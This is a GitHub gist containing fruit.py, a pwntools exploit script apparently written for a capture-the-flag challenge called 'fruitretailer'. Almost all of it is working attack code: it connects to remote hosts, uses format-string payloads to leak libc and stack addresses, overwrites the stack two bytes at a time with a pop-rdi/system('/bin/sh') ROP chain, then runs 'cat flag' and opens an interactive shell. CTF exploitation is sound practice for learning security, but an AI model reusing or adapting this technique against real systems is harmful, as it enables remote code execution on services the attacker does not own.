Skip to content

Instantly share code, notes, and snippets.

@H4niz

H4niz/fruit.py

Created June 19, 2018 17:51
Show Gist options
  • Save H4niz/b8d2d87bbeffb9519c5528224acc654d to your computer and use it in GitHub Desktop.
Save H4niz/b8d2d87bbeffb9519c5528224acc654d to your computer and use it in GitHub Desktop.
Download ZIP
Raw
fruit.py
# -----------------------------------
# | n00b-author: h4niz |
# -----------------------------------
#!/usr/bin/env python
from pwn import *
import struct
# io = process("./fruitretailer_50E291AAFA5777625B18530F5C6F7A92", env={'_LD_PRELOAD': 'libc6_2.27-3ubuntu1_amd64.so'})
host = "ec2-54-255-145-181.ap-southeast-1.compute.amazonaws.com"
port = 5000
#
host = "125.235.240.167"
io = remote(host, port)
context.clear()
# context.log_level = 'debug'
context.endian = 'little'
def buy(fr, leak, fmt):
io.recvuntil("Your choice:")
io.sendline("1")
io.recvuntil("banana (2)?:")
if(fr == 'banana'):
io.sendline("2")
elif(fr == 'apple'):
io.sendline("1")
io.recvuntil("Enter quantity:")
io.sendline(str(leak))
io.recvuntil("(Y/N)")
io.sendline('y')
io.sendline( str(fmt) )
def create_invoice():
io.recvuntil("Your choice:")
io.sendline("2")
def change_label(idx):
io.recvuntil("Your choice:")
io.sendline("3")
io.recvuntil("change:")
io.sendline( str(idx) )
io.recvuntil("new label:")
io.sendline("a"*10)
def change_comment(idx, fmt):
io.recvuntil("Your choice:")
io.sendline("4")
io.recvuntil("change:")
io.sendline( str(idx) )
io.recvuntil("address:")
io.sendline( str(fmt) )
def iquit():
io.recvuntil("Your choice:")
io.sendline("5")
#Buy banana, quantity=-1, address= "A"*0x3f + "X" + fmt
# gdb.attach(io)
data = dict()
offset = dict()
offset['system'] = 0x04f440 #0x46590
offset['__libc_start_main'] = 0x21e50
offset['ebp'] = 0x1e030
offset['poprdi'] = 0x0000000000001533 #0x22b9a
offset['poprsi'] = 0x24885
offset['sh'] = 0x1b3e9a #0x180543
fmt = "A"*0x40 + "B.%13$p.%8$p;%9$p+"
buy(fr='banana', fmt = fmt, leak=4294967295)
change_label(1)
create_invoice()
io.recvuntil("B.")
value = io.recvuntil("+").split(".")
data['libcbase'] = int(value[0], 16) - 0x021b97 #offset['__libc_start_main'] - 245
print "[+] libcbase: %#x" %data['libcbase']
print "[+] __libc_start_main_ret: %#x" %int(value[0], 16)
data['system'] = data['libcbase'] + offset['system']
print "[+] system: %#x" %data['system']
svalue = value[1].split(";")
# print svalue[0]
data['ebp'] = int(svalue[0], 16) -0x20
print "[+] ebp: %#x" %( data['ebp'])
xv = svalue[1].split("+")
print xv[0]
data['codebase'] = int(xv[0], 16) - 0x14b0
data['poprdi'] = data['codebase'] + offset['poprdi']
data['sh'] = data['libcbase'] + offset['sh']
print "[&] poprdi: %#x" %data['poprdi']
write = dict()
write[1] = struct.pack("<Q", data['poprdi'])
write[3] = struct.pack("<Q", data['system'])
write[2] = struct.pack("<Q", data['sh'])
#Take control
ebp = u16(struct.pack("<Q", data['ebp'])[:2])
control = ebp + 0x10
print "Control: %#x" %control
j = 0
pos = 2
v = 1
for i in xrange(2,19, 2):
# Change address
p = "A"*0x40
p += "%" + str( (control)+j) + "c"
p += "%6$hn"
buy(fr='banana', fmt = p, leak=4294967295)
change_label(i)
create_invoice()
#====================================
# Overwrite
p = "A"*0x40
p += "%" + str(u16(write[v][pos-2:pos])) + "c"
p += "%8$hn"
buy(fr='banana', fmt = p, leak=4294967295)
change_label(i+1)
create_invoice()
# print "%#x" %(u64(write[v]))
# print "%#x" %(u16(write[v][pos-2:pos]))
# print "%#x" %j
# print "%#x" %(control+j)
if j % 8 == 4:
j = j + 4
else:
j = j + 2
pos = pos + 2
if pos == 8:
v = v + 1
pos = 2
#Reset ebp
# Change address
p = "A"*0x40
p += "%" + str( (ebp) + 8) + "c"
p += "%6$hn"
buy(fr='banana', fmt = p, leak=4294967295)
change_label(20)
create_invoice()
#====================================
iquit()
io.sendline("cat flag")
io.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment